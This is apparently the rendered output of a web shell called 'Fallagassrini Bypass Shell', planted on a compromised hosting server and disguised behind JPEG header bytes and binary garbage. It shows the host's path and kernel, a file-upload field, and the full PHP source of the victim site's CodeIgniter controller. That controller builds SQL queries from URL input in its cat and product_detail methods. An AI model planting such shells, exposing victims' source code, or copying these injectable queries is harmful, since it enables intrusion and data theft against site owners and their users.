JFIF;CREATOR: gd-jpeg v1.0 (using IJG JPEG v80), quality = 85 C  !"$"$C$^" }!1AQa"q2#BR$3br %&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz w!1AQaq"2B #3Rbr $4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz ? C^",k8`98?þ. s$ֱ$Xw_Z¿2b978%Q}s\ŴqXxzK1\@N2<JY{lF/Z=N[xrB}FJۨ<yǽw 5o۹^s(!fF*zn5`Z}Ҋ">Ir{_+<$$C_UC)^r25d:(c⣕U .fpSnFe\Ӱ.չ8# m=8iO^)R=^*_:M3x8k>(yDNYҵ/v-]WZ}h[*'ym&e`Xg>%̲yk߆՞Kwwrd󞼎 r;M<[AC¤ozʪ+h%BJcd`*ǎVz%6}G;mcՊ~b_aaiiE4jPLU<Ɗvg?q~!vc DpA/m|=-nux^Hޔ|mt&^ 唉KH?񯣾 ^]G\4#r qRRGV!i~眦]Ay6O#gm&;UV BH ~Y8( J4{U| 14%v0?6#{t񦊊#+{E8v??c9R]^Q,h#i[Y'Š+xY佑VR{ec1%|]p=Vԡʺ9rOZY L(^*;O'ƑYxQdݵq~5_uk{yH$HZ(3 )~G Fallagassrini

Fallagassrini Bypass Shell

echo"
Fallagassrini
";
Current Path : /home/jpewexports/public_html/application/controllers/

Linux 43-225-53-84.webhostbox.net 3.10.0-1160.92.1.el7.x86_64 #1 SMP Tue Jun 20 11:48:01 UTC 2023 x86_64
Upload File :
Current File : /home/jpewexports/public_html/application/controllers/Core.php

<?php
//ini_set('display_errors', 'On');
class Core extends CI_Controller
{
	function __construct()
	{ 
		parent::__construct();	
		$this->load->database();	
		$this->load->helper(array('string','url','form'));
		$this->load->library('email');
		$this->load->library('pagination');
	}
	
	public function index()
	{
	    //echo CI_VERSION;
	   //echo "hii";
	    
		$hotline=$this->db->query("select * from contact_us where id='1'");
		$hotline_count=$hotline->num_rows();
		if($hotline_count!=0)
		{
			$data['hotline_found']='1';
			$ht=$hotline->row_array();
			if(isset($ht['hotlineno']))  { $hotlineno=$ht['hotlineno']; } else { $hotlineno=''; }
			$data['hotlineno']=$hotlineno;
		} 
			else
		{
			$data['hotline_found']='0';
		}
		$logo=$this->db->query("select * from admin where id='1'");
		$logo_found=$logo->num_rows();
		if($logo_found!=0)
		{
			$data['logo_found']='1';
			$log=$logo->row_array();
			$data['logo']=$log['logo'];
		}
		else
		{
			$data['logo_found']='0';
		}
			$this->load->view('home',$data);
	}
	
	public function category()
	{
		$hotline=$this->db->query("select * from contact_us where id='1'");
		$hotline_count=$hotline->num_rows();
		if($hotline_count!=0)
		{
			$data['hotline_found']='1';
			$ht=$hotline->row_array();
			if(isset($ht['hotlineno']))  { $hotlineno=$ht['hotlineno']; } else { $hotlineno=''; }
			$data['hotlineno']=$hotlineno;
		} 
			else
		{
			$data['hotline_found']='0';
		}
		$logo=$this->db->query("select * from admin where id='1'");
		$logo_found=$logo->num_rows();
		if($logo_found!=0)
		{
			$data['logo_found']='1';
			$log=$logo->row_array();
			$data['logo']=$log['logo'];
		}
		else
		{
			$data['logo_found']='0';
		}
			$this->load->view('category',$data);		
	}
	
	public function profile()
	{
		$hotline=$this->db->query("select * from contact_us where id='1'");
		$hotline_count=$hotline->num_rows();
		if($hotline_count!=0)
		{
			$data['hotline_found']='1';
			$ht=$hotline->row_array();
			if(isset($ht['hotlineno']))  { $hotlineno=$ht['hotlineno']; } else { $hotlineno=''; }
			$data['hotlineno']=$hotlineno;
		} 
		else
		{
			$data['hotline_found']='0';
		}
			$logo=$this->db->query("select * from admin where id='1'");
		$logo_found=$logo->num_rows();
		
		if($logo_found!=0)
		{
			$data['logo_found']='1';
			$log=$logo->row_array();
			$data['logo']=$log['logo'];
		}
		else
		{
			$data['logo_found']='0';
		}
		$this->load->view('profile',$data);		
	}
	
	
	public function career()
	{
		
				$hotline=$this->db->query("select * from contact_us where id='1'");
		$hotline_count=$hotline->num_rows();
		if($hotline_count!=0)
		{
			$data['hotline_found']='1';
			$ht=$hotline->row_array();
			if(isset($ht['hotlineno']))  { $hotlineno=$ht['hotlineno']; } else { $hotlineno=''; }
			$data['hotlineno']=$hotlineno;
		} else
		{
			$data['hotline_found']='0';
		}
			$logo=$this->db->query("select * from admin where id='1'");
		$logo_found=$logo->num_rows();
		if($logo_found!=0)
		{
			$data['logo_found']='1';
			$log=$logo->row_array();
			$data['logo']=$log['logo'];
		}
		else
		{
			$data['logo_found']='0';
		}
		$this->load->view('career',$data);		
	}
	
	public function policy()
	{
		
        $hotline=$this->db->query("select * from contact_us where id='1'");
		$hotline_count=$hotline->num_rows();
		if($hotline_count!=0)
		{
			$data['hotline_found']='1';
			$ht=$hotline->row_array();
			if(isset($ht['hotlineno']))  { $hotlineno=$ht['hotlineno']; } else { $hotlineno=''; }
			$data['hotlineno']=$hotlineno;
		} else
		{
			$data['hotline_found']='0';
		}
			$logo=$this->db->query("select * from admin where id='1'");
		$logo_found=$logo->num_rows();
		if($logo_found!=0)
		{
			$data['logo_found']='1';
			$log=$logo->row_array();
			$data['logo']=$log['logo'];
		}
		else
		{
			$data['logo_found']='0';
		}
		$this->load->view('policy',$data);		
	}

    public function faq()
	{
		
	        $hotline=$this->db->query("select * from contact_us where id='1'");
		$hotline_count=$hotline->num_rows();
		if($hotline_count!=0)
		{
			$data['hotline_found']='1';
			$ht=$hotline->row_array();
			if(isset($ht['hotlineno']))  { $hotlineno=$ht['hotlineno']; } else { $hotlineno=''; }
			$data['hotlineno']=$hotlineno;
		} else
		{
			$data['hotline_found']='0';
		}
			$logo=$this->db->query("select * from admin where id='1'");
		$logo_found=$logo->num_rows();
		if($logo_found!=0)
		{
			$data['logo_found']='1';
			$log=$logo->row_array();
			$data['logo']=$log['logo'];
		}
		else
		{
			$data['logo_found']='0';
		}
		$this->load->view('faq',$data);		
	}

    public function tac()
	{
		
	        $hotline=$this->db->query("select * from contact_us where id='1'");
		$hotline_count=$hotline->num_rows();
		if($hotline_count!=0)
		{
			$data['hotline_found']='1';
			$ht=$hotline->row_array();
			if(isset($ht['hotlineno']))  { $hotlineno=$ht['hotlineno']; } else { $hotlineno=''; }
			$data['hotlineno']=$hotlineno;
		} else
		{
			$data['hotline_found']='0';
		}
			$logo=$this->db->query("select * from admin where id='1'");
		$logo_found=$logo->num_rows();
		if($logo_found!=0)
		{
			$data['logo_found']='1';
			$log=$logo->row_array();
			$data['logo']=$log['logo'];
		}
		else
		{
			$data['logo_found']='0';
		}
		$this->load->view('tac',$data);		
	}
	
    public function certificate()
	{
		
	        $hotline=$this->db->query("select * from contact_us where id='1'");
		$hotline_count=$hotline->num_rows();
		if($hotline_count!=0)
		{
			$data['hotline_found']='1';
			$ht=$hotline->row_array();
			if(isset($ht['hotlineno']))  { $hotlineno=$ht['hotlineno']; } else { $hotlineno=''; }
			$data['hotlineno']=$hotlineno;
		} else
		{
			$data['hotline_found']='0';
		}
			$logo=$this->db->query("select * from admin where id='1'");
		$logo_found=$logo->num_rows();
		if($logo_found!=0)
		{
			$data['logo_found']='1';
			$log=$logo->row_array();
			$data['logo']=$log['logo'];
		}
		else
		{
			$data['logo_found']='0';
		}
		$this->load->view('certificate',$data);		
	}
	
	public function contact()
	{
		$hotline=$this->db->query("select * from contact_us where id='1'");
		$hotline_count=$hotline->num_rows();
		if($hotline_count!=0)
		{
			$data['hotline_found']='1';
			$ht=$hotline->row_array();
			if(isset($ht['hotlineno']))  { $hotlineno=$ht['hotlineno']; } else { $hotlineno=''; }
			$data['hotlineno']=$hotlineno;
		} 
		else
		{
			$data['hotline_found']='0';
		}
			$logo=$this->db->query("select * from admin where id='1'");
			$logo_found=$logo->num_rows();
		
		if($logo_found!=0)
		{
			$data['logo_found']='1';
			$log=$logo->row_array();
			$data['logo']=$log['logo'];
		}
		else
		{
			$data['logo_found']='0';
		}
		$this->load->view('contact_us',$data);		
	}
	
	public function news($offset=0)
	{
		$hotline=$this->db->query("select * from contact_us where id='1'");
		$hotline_count=$hotline->num_rows();
		if($hotline_count!=0)
		{
			$data['hotline_found']='1';
			$ht=$hotline->row_array();
			if(isset($ht['hotlineno']))  { $hotlineno=$ht['hotlineno']; } else { $hotlineno=''; }
			$data['hotlineno']=$hotlineno;
		} else
		{
			$data['hotline_found']='0';
		}
			$logo=$this->db->query("select * from admin where id='1'");
		$logo_found=$logo->num_rows();
		if($logo_found!=0)
		{
			$data['logo_found']='1';
			$log=$logo->row_array();
			$data['logo']=$log['logo'];
		}
		else
		{
			$data['logo_found']='0';
		}
		$config['base_url'] =base_url()."core/news/";
$config['total_rows'] =$this->db->count_all('news');
$config['per_page'] = 10;
$config['num_links'] = 3;
$config['prev_tag_open'] = '<li>';
$config['prev_tag_close'] = '</li>';
$config['num_tag_open'] = '<li>';
$config['num_tag_close'] = '</li>';
$config['cur_tag_open'] = '<li><a style="background:#f8ab16;color:#000;">';
$config['cur_tag_close'] = '</a></li>';
$config['next_tag_open'] = '<li>';
$config['next_tag_close'] = '</li>';
$this->pagination->initialize($config);

		$this->db->order_by('id','desc');
		$news= $this->db->get('news', 10, $offset);

$news_count=$news->num_rows();
if($news_count!=0)
{
	$data['n_found']='1';
	$rned=$news->result_array();
		$data['rned2']=$rned;
} else { 
	$data['n_found']='0';
}
		$this->load->view('news',$data);		
	}

	
	
	
	
	public function product($offset=0)
	{
		$hotline=$this->db->query("select * from contact_us where id='1'");
		$hotline_count=$hotline->num_rows();
		if($hotline_count!=0)
		{
			$data['hotline_found']='1';
			$ht=$hotline->row_array();
			if(isset($ht['hotlineno']))  { $hotlineno=$ht['hotlineno']; } else { $hotlineno=''; }
			$data['hotlineno']=$hotlineno;
		} 
		else
		{
			$data['hotline_found']='0';
		}
			$logo=$this->db->query("select * from admin where id='1'");
			$logo_found=$logo->num_rows();
			
		if($logo_found!=0)
		{
			$data['logo_found']='1';
			$log=$logo->row_array();
			$data['logo']=$log['logo'];
		}
		else
		{
			$data['logo_found']='0';
		}
		

		if(isset($_GET['cat'])) 
		{ 
				$this->db->where('category',$_GET['cat']);
				$products= $this->db->get('products', 3, $offset);
		}
		else 
		if(isset($_REQUEST['ser'])) 
		{ 
			$quer=$this->input->post("search_query");
			$this->db->like('title',$quer);
			$this->db->like('description',$quer);
			$products= $this->db->get('products', 10, $offset);
		} else 
	
		{
			$this->db->order_by('id','desc');
			$products= $this->db->get('products', 3, $offset);
		}
			$product_count=$products->num_rows();
		if($product_count!=0)
		{
			$data['p_found']='1';
			$pdata=$products->result_array();
			$data['pdata']=$pdata;
		} else 
		{ 
			$data['p_found']='0';
		}
		$config['base_url'] =base_url()."core/product/";
		$config['total_rows'] =$this->db->count_all('products');
		$config['per_page'] = 2;
		$config['num_links'] = 4;
		//$config['prev_tag_open'] = '<li>';
		//$config['prev_tag_close'] = '</li>';
		//$config['num_tag_open'] = '<li>';
		//$config['num_tag_close'] = '</li>';
		//$config['cur_tag_open'] = '<li><a style="background:#f8ab16;color:#000;">';
		//$config['cur_tag_close'] = '</a></li>';
	//	$config['next_tag_open'] = '<li>';
//		$config['next_tag_close'] = '</li>';
		$this->pagination->initialize($config);
		$this->load->view('products',$data);		
	}
	
	/*888888888888888  copied 000000000000 */
	
	public function search($offset=0)
	{
		$hotline=$this->db->query("select * from contact_us where id='1'");
		$hotline_count=$hotline->num_rows();
		if($hotline_count!=0)
		{
			$data['hotline_found']='1';
			$ht=$hotline->row_array();
			if(isset($ht['hotlineno']))  { $hotlineno=$ht['hotlineno']; } else { $hotlineno=''; }
			$data['hotlineno']=$hotlineno;
		} 
		else
		{
			$data['hotline_found']='0';
		}
			$logo=$this->db->query("select * from admin where id='1'");
			$logo_found=$logo->num_rows();
			
		if($logo_found!=0)
		{
			$data['logo_found']='1';
			$log=$logo->row_array();
			$data['logo']=$log['logo'];
		}
		else
		{
			$data['logo_found']='0';
		}
		

		 
			$quer=$this->input->post("search_query");
			$this->db->like('title',$quer);
			$this->db->like('description',$quer);
			$products= $this->db->get('products', 10, $offset);
		
		$config['base_url'] =base_url()."core/search/";
		$config['total_rows'] =$this->db->count_all('products');
		$config['per_page'] = 2;
		$config['num_links'] = 4;
		$config['prev_tag_open'] = '<li>';
		$config['prev_tag_close'] = '</li>';
		$config['num_tag_open'] = '<li>';
		$config['num_tag_close'] = '</li>';
		$config['cur_tag_open'] = '<li><a style="background:#f8ab16;color:#000;">';
		$config['cur_tag_close'] = '</a></li>';
		$config['next_tag_open'] = '<li>';
		$config['next_tag_close'] = '</li>';
		$this->pagination->initialize($config);
		//$this->db->order_by('id','desc');
		//$this->db->where('category',$id);
		$products= $this->db->get('products', 2, $offset);
	
			$product_count=$products->num_rows();
		if($product_count!=0)
		{
			$data['p_found']='1';
			$pdata=$products->result_array();
			$data['pdata']=$pdata;
		} else 
		{ 
			$data['p_found']='0';
		}
		
		$this->load->view('products',$data);		
	}
	
	/*888888888888888  copied 000000000000 */
	public function cat($nm,$page=0, $offset=0)
	{
		
	
           $name1=str_replace("-"," ",$nm);
    	   $name2=str_replace("_","-",$name1);
    	   $name3=str_replace("[","(",$name2);
    	   $name4=str_replace("]",")",$name3);
    	   $name6=str_replace("percent","%",$name4);
    	   $name6=str_replace("+","/",$name6);
    	   
    	   $s_cat=$this->db->query("select * from categories where category='".$name6."'");
    	   $n_cat=$s_cat->num_rows();
    	   if($n_cat>0)
    	   {
    	      $r_cat=$s_cat->row_array();
    		  $id=$r_cat['id'];
    	   }
    	   else
    	   {
    	          $s_cat=$this->db->query("select * from categories where category like '".$name6."'");
    	   		  $n_cat=$s_cat->num_rows();
    	           if($n_cat>0)
    			   {
    				  $r_cat=$s_cat->row_array();
    				  $id=$r_cat['id'];
    			   }
    			   else
    			   {
    			      $id=0;
    			   } 
    	   }
    	   
    $_SESSION['page']=$page; 
    $hotline=$this->db->query("select * from contact_us where id='1'");
    $hotline_count=$hotline->num_rows();
    if($hotline_count!=0)
    {
    $data['hotline_found']='1';
    $ht=$hotline->row_array();
    if(isset($ht['hotlineno']))  { $hotlineno=$ht['hotlineno']; } else { $hotlineno=''; }
    $data['hotlineno']=$hotlineno;
    } 
    else
    {
    $data['hotline_found']='0';
    }
    $logo=$this->db->query("select * from admin where id='1'");
    $logo_found=$logo->num_rows();
    
    if($logo_found!=0)
    {
    $data['logo_found']='1';
    $log=$logo->row_array();
    $data['logo']=$log['logo'];
    }
    else
    {
    $data['logo_found']='0';
    }
    
    $config['base_url'] =base_url()."core/cat/".$id;
    //$this->db->where('category',$id);
    //$config['total_rows'] =$this->db->count_all('products');
    $category=$this->db->query("select * from products where category=".$id."");
    $config['total_rows']=$category->num_rows();
    $config['per_page'] = 2;
    $config['num_links'] = 2;
    $config['prev_tag_open'] = '<li>';
    $config['prev_tag_close'] = '</li>';
    $config['num_tag_open'] = '<li>';
    $config['num_tag_close'] = '</li>';
    $config['cur_tag_open'] = '<li><a style="background:#f8ab16;color:#000;">';
    $config['cur_tag_close'] = '</a></li>';
    $config['next_tag_open'] = '<li>';
    $config['next_tag_close'] = '</li>';
    $this->pagination->initialize($config);
    $this->db->order_by('id','desc');
    $this->db->where('category',$id);
    $products= $this->db->get('products', 2, $offset);
    
    $product_count=$products->num_rows();
    if($product_count!=0)
    {
    $data['p_found']='1';
    $pdata=$products->result_array();
    $data['pdata']=$pdata;
    } else 
    { 
    $data['p_found']='0';
    }
    //$data['text']= 'categories';
    $data['id']=$id;
    $this->load->view('products',$data);		
		
	}
	
	
	
	
	public function product_detail($nm=0,$nm1=0)
	{
	   // echo $nm;
	   // echo $nm1;
	 
	
		                       
		                           $name0=str_replace("%20","+",$nm1);
		                          //$name0=str_replace(" " ",$nm1);
	   							   $name1=str_replace("-"," ",$name0);
								   $name2=str_replace("_","-",$name1);
								   $name3=str_replace("[","(",$name2);
								   $name4=str_replace("]",")",$name3);
								   $name6=str_replace("percent","%",$name4);
								   $name6=str_replace("+","/",$name6);
								   
								   $s_cat=$this->db->query("select * from products where title='".$name6."'");
								  
								   $n_cat=$s_cat->num_rows();
								   
								   if($n_cat>0)
								   {
								      $r_cat=$s_cat->row_array();
									  $id=$r_cat['id'];
								   }
								   else
								   {
								          $s_cat=$this->db->query("select * from products where title like '".$name6."'");
								   		  $n_cat=$s_cat->num_rows();
								           if($n_cat>0)
										   {
											  $r_cat=$s_cat->row_array();
											  $id=$r_cat['id'];
										   }
										   else
										   {
										      $id=0;
										   } 
								   }
		
		$hotline=$this->db->query("select * from contact_us where id='1'");
		$hotline_count=$hotline->num_rows();
		if($hotline_count!=0)
		{
			$data['hotline_found']='1';
			$ht=$hotline->row_array();
			if(isset($ht['hotlineno']))  { $hotlineno=$ht['hotlineno']; } else { $hotlineno=''; }
			$data['hotlineno']=$hotlineno;
		} 
		else
		{
			$data['hotline_found']='0';
		}
			$logo=$this->db->query("select * from admin where id='1'");
			$logo_found=$logo->num_rows();
			
		if($logo_found!=0)
		{
			$data['logo_found']='1';
			$log=$logo->row_array();
			$data['logo']=$log['logo'];
		}
		else
		{
			$data['logo_found']='0';
		}
		

		//if(isset($_GET['det'])) 
		//{ 
				$this->db->where('id',$id);
			    $produc= $this->db->get('products');
			   
			    
		//}
		 
			$product_count=$produc->num_rows();
		if($product_count!=0)
		{
			$data['p_found']='1';
			$pdata=$produc->row_array();
			$data['pdata']=$pdata;
		
		} else 
		{ 
			$data['p_found']='0';
		}
		$this->load->view('product-detail',$data);		
	}
	
	public function submit_contact()
	{
		$to="admin@gmail.com";
		$from=$this->input->post("email");
		$name=$this->input->post("name");
		$subject=$this->input->post("subject");
		$message=$this->input->post("message");

		$this->email->from('info@indiit.com', 'Activation Mail');
		$this->email->to($to);
		// $this->email->cc();
		// $this->email->bcc();
		
		$this->email->subject($subject);
		$this->email->message("Message  from :".$name." Message  : ".$message);
		$this->email->send();
		//echo $this->email->print_debugger();
		$_SESSION['send']="Message has been sent successfully";
		?>
		<script>
			window.location.href="<?php echo base_url(); ?>contact"
		</script>
		<?php
	}
} /////////////////////////////*********************************/      	end class						/////////////////////**************/ 
	?>

bypass 1.0, Devloped By El Moujahidin (the source has been moved and devloped)
Email: contact@elmoujehidin.net